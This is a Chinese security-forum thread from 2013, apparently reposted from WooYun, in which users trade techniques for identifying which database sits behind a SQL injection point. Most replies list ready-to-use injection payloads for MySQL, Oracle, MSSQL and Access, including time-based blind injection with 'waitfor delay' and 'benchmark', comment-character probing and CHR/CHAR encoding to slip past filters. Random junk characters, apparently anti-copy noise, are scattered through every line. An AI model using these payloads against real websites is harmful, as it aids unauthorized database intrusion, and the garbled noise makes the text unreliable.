找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2115|回复: 0
打印 上一主题 下一主题

一个注射点如何最快速确认是什么类型数据库

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-11 09:54:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一个注射点如何最快速确认是什么类型数据库+ }) n2 W, B/ C" n, A) I
xsser (十根阳具有长短!!) | 2013-02-05 12:36# _4 z& H- J0 g7 a. W+ O
假设这么一个注射点:
( F: Y5 u7 r( ]$ j* G. m1 }; V" Xshow.html?id=2" E6 t5 `( W: Y+ `) C8 d: J
mysql:id=2 and version()>0$ Z9 V! g8 S$ o( I2 r2 S
oracle:id=2 and '1'||'1'='114 \# i# V4 O# O- A
其他的欢迎补充$ b# W2 Z0 o" W
1#" K" y) R! R) Q% C/ [  P
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47# e' [) y% T! t  U
Access:
6 F8 Z* W. @. iaNd aSc(cHr(97))=97
3 u0 l: Y7 r7 H# Xand exists(select id from MSysAccessObjects)
! r1 @7 [6 z4 d! w, ASQL Server:
: g' i3 @) G4 b# q/ a# {and exists(select id from sysobjects)
7 L# b: B) T8 h; h" G. {* \and length(user)>08 Q# Z2 |' B% ?  T5 q& @$ {/ o
MySQL:
! H! Y+ J) e" x8 y* K5 y! Oand length(user())>0& b( a  e& O% l& y( K
2#7 [# i4 U+ D4 j( n8 X' n
xsser (十根阳具有长短!!) | 2013-02-05 12:48( r6 e% r, H! U' K5 C
@upload 如果这些都不是呢…
, @# F$ ^5 N6 Y3#
  N, j9 V2 l" m! t* e, Supload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03% l; l/ M6 n& a- r2 V; U: k; [1 K. l
@xsser 不快速的,延时注入
- V; O5 v6 [( s/ V1 U! C不知道这样写对不对
2 j! w0 S* F( |: X9 S. s9 A; umssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
7 D5 z, Q$ p% ?, hmysql:id=2 and select benchmark(1e8,current_date());2 \7 N, G: \! V; Y& @( k& J
4#
6 _+ y3 {6 o& A" q% [$ y0 D, uupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
. j1 b& e) k9 k% d$ a+ k最快的貌似是看报错信息
! Z/ X  ~1 i- p( a  ooracle error
  O6 f% N" _% s  J6 c8 I3 Imssql error
% y" p$ `) t5 J) F+ Pmysql error' E/ [- n; p. j
5#+ g% D3 D) Q( q, w4 o/ ]
Nimda (你们都是坏银~) | 2013-02-05 13:14
/ j5 Z) U/ i" b# f( t5 Q$ q: g/ f小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)+ M7 m) ?9 @+ n; b, P
6#
% K: Y& U7 S, g# q; m3 N3 kupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:219 [* M) \6 r! B# c3 N
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:) ^, X& j8 _  k
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:1 h. V) H7 e7 F6 F
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。8 N! w; L: h& X# k
7#
3 `! Q' b1 H% Z' r6 M_Evil (HackEnd) | 2013-02-05 13:332 m5 P* W% w3 D& l, b
PostgreSQL+ I* n! P% R" k5 a; i
8#
( I* y1 i. I! b( P+ hupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
) F. Y4 k) d6 X: w' j% Q- O切换编码 and 1=1& l9 F, u! V' [0 O* m7 y+ k
oracle:4 A' q9 G6 |+ S3 N! v. R6 `$ U
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)2 a: c+ [1 c# z: Y5 k( Z5 `2 ^
mssql:
4 W' B1 \$ M; A0 H$ BCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
% W$ h& {2 e. f% x, O% h- jmysql:! M# H/ J' t  U
CHAR(97, 110, 100, 32, 49, 61, 49): f7 h6 A# }) L# t
9#5 t8 B* N4 L0 Y; I+ w
xsser (十根阳具有长短!!) | 2013-02-05 14:31
* o! J8 e* H$ b7 u3 g, G$ y1 Y9 |% H@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
7 k  I$ O$ S8 I4 [9 {10#
/ X! r# S. t  [. ^upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46' |  z* ?6 i5 K: x
@xsser 是奇葩数据库类型的么?
4 v% }4 u" m/ v% Z0 E6 @( S根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
; _3 u. V0 d( n' G1 P& R: C1.是否可以使用特定的函数来判断,该数据库特有的
+ N1 [6 N6 c2 E) @2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等9 g; V: L+ O3 _! u6 P
3.是否可以编码查询9 r& \( W' O) a- `6 I" h9 ]/ L
4.是否显可以利用错信息
5 u: m" P8 k, X8 M; d. p* u- @8 o5.是否存在数据库某些特性辅助判断
' g1 k$ l( `0 q& K; V个人见解
( }5 o& N6 U+ e* A; o11#7 T3 p6 w- M% x) O5 `, k6 _
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:556 v2 h; b+ }( r" u! \7 h' K
已收藏,mssql可以直接看到错误提示的吧~
8 F4 U: I' C4 J, q, O; ~- H! y12#5 c9 r, V6 J$ |2 V- o; _: ^* ^
Passer_by | 2013-02-05 15:09: U4 ^" m" s8 z! k/ z$ l9 h' A
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。! W/ I3 a" V# F* ^" j
from:http://zone.wooyun.org/content/260
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表